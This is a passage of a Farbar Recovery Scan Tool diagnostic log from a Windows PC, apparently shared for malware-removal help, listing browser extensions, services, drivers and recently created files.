    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2015-12-22] ()
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)

    Chrome:
    =======
    CHR Plugin: (Widevine Content Decryption Module) - C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\WidevineCdm\_platform_specific\win_x64\widevinecdmadapter.dll (Google Inc.)
    CHR Plugin: (Shockwave Flash) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.194\pepflashplayer.dll ()
    CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default [2017-02-01]
    CHR Extension: (Google Docs) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-24]
    CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-24]
    CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-22]
    CHR Extension: (Bitdefender Wallet) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2017-02-01]
    CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-22]
    CHR Extension: (AdBlock) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
    CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-22]
    CHR Extension: (Chrome Media Router) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-04]
    CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3699904 2016-12-28] (Microsoft Corporation)
    S2 cplspcon; C:\WINDOWS\system32\IntelCpHDCPSvc.exe [431088 2016-09-25] (Intel Corporation)
    S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [100448 2016-11-29] (Bitdefender)
    R2 esifsvc; C:\WINDOWS\SysWoW64\esif_uf.exe [1419424 2016-09-25] (Intel Corporation)
    R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2015-12-22] (WildTangent)
    R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [48128 2016-04-18] (HP Inc.) [File not signed]
    R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
    R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-01-11] (HP Inc.)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [19440 2015-11-04] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [356336 2016-09-25] (Intel Corporation)
    S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel® Corporation)
    S3 Intel® WiDi SAM; C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-09-17] (Intel Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
    S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
    R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
    R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
    R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [322560 2017-01-13] (Realtek Semiconductor)
    R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [266872 2016-08-19] (Synaptics Incorporated)
    R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-01-06] (Bitdefender)
    R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1526528 2017-02-01] (Bitdefender)
    R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
    R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
    R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
    S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
    R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
    R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
    R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [52208 2016-09-25] (Intel Corporation)
    R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [260080 2016-09-25] (Intel Corporation)
    R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
    R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
    R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [345872 2016-05-26] (Intel Corporation)
    R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [309280 2016-11-17] (Bitdefender)
    R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176064 2017-02-01] (Malwarebytes)
    R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-01] (Malwarebytes)
    R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-01] (Malwarebytes)
    R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251848 2017-02-01] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [91584 2017-02-01] (Malwarebytes)
    R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-01] (Malwarebytes)
    S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
    U5 Netwtw02; C:\Windows\System32\Drivers\Netwtw02.sys [6724368 2016-02-06] (Intel Corporation)
    R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
    R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2016-01-19] (Realtek                                            )
    S3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2016-01-20] (Realsil Semiconductor Corporation)
    S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [413912 2016-01-20] (Realsil Semiconductor Corporation)
    S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [58984 2016-02-22] (Synaptics Incorporated)
    R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [72824 2016-08-19] (Synaptics Incorporated)
    R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
    S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
    S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
    S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
    R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31656 2016-04-14] (HP)
    U0 aswVmm; no ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-02-01 21:13 - 2017-02-01 21:16 - 00002795 _____ C:\Users\Joseph\Downloads\Fixlog.txt
    2017-02-01 21:11 - 2017-02-01 21:13 - 00000000 ____D C:\Users\Joseph\Documents\FRST911
    2017-02-01 20:30 - 2017-02-01 21:28 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Mozilla
    2017-02-01 20:29 - 2017-02-01 20:36 - 00000000 ____D C:\Users\Joseph\AppData\Local\Mozilla
    2017-02-01 20:29 - 2017-02-01 20:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Mozilla
    2017-02-01 20:28 - 2017-02-01 20:28 - 00001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-02-01 20:28 - 2017-02-01 20:28 - 00001227 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2017-02-01 20:26 - 2017-02-01 20:27 - 00245424 _____ C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe
    2017-02-01 18:24 - 2017-02-01 18:25 - 55566792 _____ (Malwarebytes ) C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe
    2017-02-01 17:47 - 2017-02-01 21:09 - 00041949 _____ C:\Users\Joseph\Downloads\Addition.txt
    2017-02-01 17:45 - 2017-02-01 21:30 - 00024848 _____ C:\Users\Joseph\Downloads\FRST.txt
    2017-02-01 17:45 - 2017-02-01 21:30 - 00000000 ____D C:\FRST
    2017-02-01 17:43 - 2017-02-01 17:45 - 02420736 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
    2017-02-01 17:20 - 2017-02-01 17:27 - 00000556 _____ C:\Users\Joseph\Desktop\JRT.txt
    2017-02-01 17:07 - 2017-02-01 21:17 - 00002361 _____ C:\bdlog.txt
    2017-02-01 17:02 - 2017-02-01 18:10 - 00000000 ____D C:\AdwCleaner
    2017-02-01 16:58 - 2017-02-01 17:15 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT (1).exe
    2017-02-01 16:56 - 2017-02-01 16:58 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT.exe
    2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ C:\Users\Joseph\Downloads\AdwCleaner.exe
    2017-02-01 16:52 - 2017-02-01 16:52 - 00040137 _____ C:\ProgramData\dm.1485985887.bdinstall.bin
    2017-02-01 09:33 - 2017-02-01 09:33 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
    2017-02-01 08:54 - 2017-02-01 08:54 - 00000000 ____D C:\Users\Joseph\AppData\Temp
    2017-02-01 08:52 - 2017-02-01 08:52 - 00056949 _____ C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 08:51 - 2017-02-01 08:51 - 00000000 ____D C:\ProgramData\Bitdefender Device Management
    2017-02-01 08:47 - 2017-02-01 18:34 - 00003406 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
    2017-02-01 08:47 - 2017-02-01 08:47 - 00403991 _____ C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:45 - 2017-02-01 08:45 - 00002310 _____ C:\Users\Public\Desktop\Bitdefender 2017.lnk
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\BDLogging
    2017-02-01 08:44 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
    2017-02-01 08:44 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
    2017-02-01 08:44 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
    2017-02-01 08:44 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\WINDOWS\system32\Drivers\bdvedisk.sys
    2017-02-01 08:44 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
    2017-02-01 08:43 - 2017-02-01 08:51 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Bitdefender
    2017-02-01 08:43 - 2016-11-17 05:00 - 00309280 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\ignis.sys
    2017-02-01 08:38 - 2017-02-01 18:34 - 00000000 ____D C:\ProgramData\Bitdefender
    2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\Program Files\Bitdefender
    2017-02-01 08:38 - 2016-10-29 08:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
    2017-02-01 08:38 - 2016-06-22 14:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
    2017-02-01 08:37 - 2017-02-01 08:38 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
    2017-02-01 08:37 - 2017-02-01 08:37 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\QuickScan
    2017-02-01 08:29 - 2017-02-01 08:29 - 00003794 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
    2017-02-01 08:27 - 2017-02-01 21:29 - 00000000 ____D C:\Program Files\Bitdefender Agent
    2017-02-01 08:27 - 2017-02-01 08:27 - 00047353 _____ C:\ProgramData\agent.1485955633.bdinstall.bin
    2017-02-01 08:27 - 2017-02-01 08:27 - 00000000 ____D C:\ProgramData\Bitdefender Agent
    2017-02-01 08:26 - 2017-02-01 08:27 - 11842648 _____ C:\Users\Joseph\Downloads\bitdefender_windows_43ea11d5-575e-4d5e-84a9-5683192df898.exe
    2017-01-31 23:27 - 2017-01-31 23:27 - 00000017 _____ C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-01-31 23:13 - 2017-01-31 23:13 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\132034FB.sys
    2017-01-31 15:37 - 2017-01-31 15:37 - 01923396 _____ C:\Users\Joseph\Downloads\hospital visit.pdf
    2017-01-30 20:58 - 2017-01-30 20:59 - 02059056 _____ (The Nielsen Company) C:\Users\Joseph\Downloads\ShopTracker_033D6D4A68A315B4A000 (2).exe
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\Program Files\Common Files\AV
    2017-01-25 00:02 - 2016-12-21 02:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
    2017-01-25 00:02 - 2016-12-20 23:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
    2017-01-24 23:47 - 2017-01-21 21:14 - 00485032 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
    2017-01-24 17:47 - 2017-01-24 17:47 - 10697014 _____ C:\Users\Joseph\Downloads\FDN_Glyphosate_FoodTesting_Report_p2016.pdf
    2017-01-24 13:33 - 2017-01-24 13:33 - 00083650 _____ C:\Users\Joseph\Downloads\visit 1-23.pdf
    2017-01-21 13:55 - 2017-02-01 08:34 - 00000000 ____D C:\ProgramData\AVAST Software
    2017-01-21 13:55 - 2017-01-21 13:55 - 06253640 _____ (AVAST Software) C:\Users\Joseph\Downloads\avast_free_antivirus_setup_online_cnet_2.exe
    2017-01-19 21:09 - 2017-01-19 21:09 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill (2).pdf
    2017-01-19 21:09 - 2017-01-19 21:09 - 00150985 _____ C:\Users\Joseph\Downloads\PDF_Bill (3).pdf
    2017-01-19 21:08 - 2017-01-19 21:08 - 00199440 _____ C:\Users\Joseph\Downloads\PDF_Bill (1).pdf
    2017-01-19 21:06 - 2017-01-19 21:06 - 00001115 _____ C:\Users\Joseph\Downloads\AccountEnergyUsage.csv
    2017-01-19 20:26 - 2017-01-19 20:26 - 00223944 _____ C:\Users\Joseph\Downloads\djcxMjYtODA5MC04MDkxLTgzNjMtT0lCMS00MDRGQUFCQi0wLTIyMzk0NC00Nzk2ODE3LTIyMzk0NC04NS02OC0wLTE2OS0wLV4BUAExNzA5NgEyMzYxNAE0AUNCQwFDQkMwMQEyMDA0LTAwMDEBQUNDRVNTIE5BVElPTkFMIENPUlBPUkFUSU9OIFBST0ZJVCBTSEFSSU5HIFBMQU4BTkEBUk.pdf
    2017-01-19 14:36 - 2017-01-19 14:36 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Temp
    2017-01-18 22:07 - 2017-01-18 22:07 - 00676419 _____ C:\Users\Joseph\Downloads\137230-201711873115438.pdf
    2017-01-15 18:00 - 2017-01-15 18:00 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill.pdf
    2017-01-15 16:33 - 2017-01-15 16:33 - 00086004 _____ C:\Users\Joseph\Downloads\DS82_Complete (1).pdf
    2017-01-15 16:15 - 2017-01-15 16:15 - 00683112 _____ C:\Users\Joseph\Downloads\taxReturn (1).tax2016
    2017-01-15 16:11 - 2017-01-15 16:24 - 01487502 _____ C:\Users\Joseph\Downloads\taxReturn.tax2016
    2017-01-15 15:50 - 2017-01-15 15:50 - 06281998 _____ C:\Users\Joseph\Downloads\C2 Artist Mini-Posters.pdf
    2017-01-15 15:44 - 2017-01-15 15:44 - 00002529 _____ C:\Users\Public\Desktop\TurboTax 2016.lnk
    2017-01-15 15:44 - 2017-01-15 15:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2016
    2017-01-15 15:29 - 2017-01-15 15:30 - 121060464 _____ C:\Users\Joseph\Downloads\turbotax_deluxe_2016_windows.exe
    2017-01-14 21:56 - 2017-01-14 21:56 - 00085948 _____ C:\Users\Joseph\Downloads\DS82_Complete.pdf
    2017-01-14 11:22 - 2017-01-14 11:22 - 00235450 _____ C:\Users\Joseph\Downloads\CAMP_CONNECTION_CARNIVAL_flier2106.pdf
    2017-01-13 15:55 - 2017-01-13 15:53 - 72520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
    2017-01-13 15:55 - 2017-01-13 15:53 - 07704619 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
    2017-01-13 15:55 - 2017-01-13 15:53 - 03204096 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 03014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
    2017-01-13 15:55 - 2017-01-13 15:53 - 02706856 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 02201088 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01615656 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01529136 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64Proxy.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01435136 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01360512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01003320 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDHF64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00984912 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00865912 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SEHDHF32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00859216 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00850400 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00721800 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00689872 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00574752 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00499152 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00467152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00438688 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\CAF64APO2.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00381400 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00258864 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00118592 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00112488 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\Caf64api.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00005604 _____ C:\WINDOWS\system32\cxapo.lncs
    2017-01-13 15:55 - 2017-01-13 15:53 - 00000736 _____ C:\WINDOWS\system32\cxapo.prop
    2017-01-11 23:08 - 2017-01-11 23:08 - 02604526 _____ C:\Users\Joseph\Downloads\AAS-L2-Student-Packet-Sample.pdf
    2017-01-11 22:56 - 2017-01-11 22:56 - 02399782 _____ C:\Users\Joseph\Downloads\AAS-L1-Student-Packet-Sample.pdf
    2017-01-11 22:55 - 2017-01-11 22:55 - 05323693 _____ C:\Users\Joseph\Downloads\AAR-L1-2ndEd-CobwebtheCat-Sample.pdf
    2017-01-11 15:10 - 2017-01-11 15:10 - 05432492 _____ C:\Users\Joseph\Downloads\01-08-2017.pdf
    2017-01-11 15:07 - 2017-01-11 15:07 - 00106459 _____ C:\Users\Joseph\Downloads\bill_10912246.pdf
    2017-01-10 22:58 - 2016-12-21 00:09 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
    2017-01-10 22:58 - 2016-12-21 00:01 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
    2017-01-10 22:58 - 2016-12-20 23:46 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
    2017-01-10 22:58 - 2016-12-20 23:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:58 - 2016-12-20 23:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
    2017-01-10 22:58 - 2016-12-20 23:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
    2017-01-10 22:58 - 2016-12-20 23:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
    2017-01-10 22:58 - 2016-12-20 23:34 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
    2017-01-10 22:58 - 2016-12-20 23:25 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
    2017-01-10 22:58 - 2016-12-14 00:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
